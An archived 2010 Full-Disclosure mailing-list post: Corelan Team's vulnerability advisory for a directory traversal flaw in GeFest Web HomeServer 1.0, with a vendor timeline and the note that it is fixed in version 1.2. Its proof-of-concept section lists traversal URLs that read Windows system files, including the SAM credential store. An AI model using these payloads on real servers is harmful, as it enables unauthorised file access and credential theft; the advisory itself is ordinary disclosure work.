lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <C0641B79F7D6A44791BA8FA35BC143F9016897B95358@apollo.corelan.be>
Date: Mon, 8 Feb 2010 14:24:12 +0100
From: Security <security@...elan.be>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"secalert@...urityreason.com" <secalert@...urityreason.com>,
	"submissions@...ketstormsecurity.org"
	<submissions@...ketstormsecurity.org>, 
	"vuln@...unia.com" <vuln@...unia.com>
Cc: Corelan Team <Corelan.Team@...elan.be>
Subject: CORELAN-10-010 - GeFest Web HomeServer v1.0
 Remote Directory Traversal Vulnerability

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@...elan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-010
Disclosure date : February 8th, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : GeFest Web HomeServer
[*] Version : 1.0
[*] URL : http://clearweb.org.ua/
[*] Platform : Windows
[*] Type of vulnerability : Remote Directory Traversal
[*] Risk rating : High (possible access to sensitive files)
[*] Issue fixed in version : 1.2
[*] Vulnerability discovered by : MarkoT
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,
                      sinn3r, Jacky 'Redsees' & jnz


0x01 : Vendor description of software
-------------------------------------
>>From the vendor website:

"""Gefest Web Home Server is a Simple Web Server with Graphical User interface.
Server allow watch video directly from another pc.
Server allow create software storage.
Server support password protection.
Server allow review all user activity (Server log and Activity log)
Share your folders in internet or local network.
Add / Remove folders with use simple interface."""


0x02 : Vulnerability details
----------------------------
By default, the utility runs as an application (and it's very likely that people will run this with administrator privileges)
The discovered vulnerability allows an attacker to access files outside of the web application root.

PoC :
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32
http://192.168.1.200:8080/\../\../\../boot.ini



0x03 : Vendor communication
---------------------------
[*] February 4th, 2010 - Vendor contacted
[*] February 5th, 2010 - Version 1.20 released
[*] February 8th, 2010 - Public disclosure

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ